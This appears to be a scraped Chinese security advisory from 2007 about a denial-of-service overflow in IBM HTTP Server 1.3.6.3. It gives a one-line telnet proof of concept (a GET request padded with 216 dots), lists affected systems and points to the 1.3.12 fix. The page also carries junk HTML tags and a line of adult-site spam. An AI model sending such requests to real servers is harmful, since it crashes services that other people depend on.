• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • 通過提交超長的GET請求導致IBM HTTP Server遠程溢出

    發表于:2007-07-14來源:作者:點擊數: 標簽:
    涉及程序: GET 描述: 通過提交超長的GET請求導致IBM HTTP Server遠程溢出 詳細: IBM 的 HTTP 服務器 是一個 web 服務器。在 Windows NT 使用的版本中存在拒絕服務的漏洞。 如果提交一個超過219個字符的 GET 請求,將導致服務器停止響應,并報錯。要恢復服
    涉及程序:
    GET

    描述:
    通過提交超長的GET請求導致IBM HTTP Server遠程溢出


    詳細:
    IBM 的 HTTP 服務器是一個 web 服務器。在 Windows NT 使用的版本中存在拒絕服務的漏洞。

    如果提交一個超過219個字符的 GET 請求,將導致服務器停止響應,并報錯。要恢復服務正常工作需要重新啟動應用程序。成功的利用該漏洞,攻擊者可在受害的主機上執行任何代碼。(但這還未得到完全證實。)


    以下代碼僅僅用來測試和研究這個漏洞,如果您將其用于不正當的途徑請后果自負


    $ telnet target 80
    GET /......(216個".")aaa HTTP/1.0

    則系統會報告下列錯誤信息:
    ***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
    ON_NOT_HANDLED.
    ***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
    注意:目標主機運行在Windows 2000下。

    受影響的系統
    IBM HTTP Server 1.3.6.3
    - TurboLinux Turbo Linux 3.0.1
    - Sun Solaris 2.6
    - S.u.S.E. Linux 6.1
    - S.u.S.E. Linux 6.0
    - RedHat Linux 6.0 sparc
    - RedHat Linux 5.2 sparc
    - Microsoft Windows NT 4.0
    - IBM AIX 4.2.1
    - Caldera OpenLinux 2.2

    解決方案:
    IBM 已經在 1.3.12 版本中解決了此問題,下載地址:
    http://www-4.ibm.com/software/webservers/httpservers/download.html

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>